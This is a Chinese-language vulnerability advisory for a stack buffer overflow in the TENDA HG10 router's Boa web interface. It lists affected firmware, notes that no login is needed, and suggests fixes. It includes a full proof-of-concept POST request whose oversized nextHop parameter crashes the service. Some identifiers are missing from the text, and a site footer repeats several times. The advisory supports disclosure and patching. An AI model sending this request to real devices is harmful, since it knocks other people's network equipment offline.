TENDA HG10 Web管理界面栈缓冲区溢出漏洞 (CWE-121)

TENDA HG10: 栈缓冲区溢出漏洞 (CWE-121) 漏洞概述 TENDA HG10 的 Web 管理界面 ( ) 存在栈缓冲区溢出漏洞。攻击者可以通过发送过长的 参数，导致 Boa 服务崩溃或可能实现任意代码执行。 影响范围 影响类型: 拒绝服务 (DoS)；潜在的远程代码执行 (RCE)。 认证要求: 不需要认证。 受影响产品: TENDA HG10 AC1200 Dual-Band Wi-Fi xPON ONT。 固件版本: HG7_HG9_HG10re_300001138_en_xpon。 技术细节 漏洞位于 Boa 组件的 处理函数中。该函数使用 获取 参数，并使用 将其复制到栈上的 缓冲区中。由于 仅分配了 20 字节，而 没有进行长度检查，导致缓冲区溢出。 修复方案 在复制数据前对 参数进行长度验证或截断。 使用安全的字符串复制函数（如 ）替代 。 概念验证 (PoC) 步骤: 1. 连接 TENDA HG10 管理界面。 2. 发送包含超长 参数的 POST 请求。 3. 观察到 Boa 服务崩溃，Web 界面无法访问。 示例请求: ```http POST /boaform/formRouteing HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:149.0) Gecko/20100101 Firefox/149.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.6,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 228 Origin: http://192.168.188.140:8888 Connection: keep-alive Referer: http://192.168.188.140:8888/admin/login.asp Upgrade-Insecure-Requests: 1 Priority: u=0, 1 destNet=1.1.0&subMask=255.255.255.0&interface=lan1&nextHop=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

目标达成感谢每一位支持者 — 我们达成了 100% 目标！

TENDA HG10 Web管理界面栈缓冲区溢出漏洞 (CWE-121)

同源更多文章

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

TENDA HG10 Web管理界面栈缓冲区溢出漏洞 (CWE-121)

同源更多文章

目标达成感谢每一位支持者 — 我们达成了 100% 目标！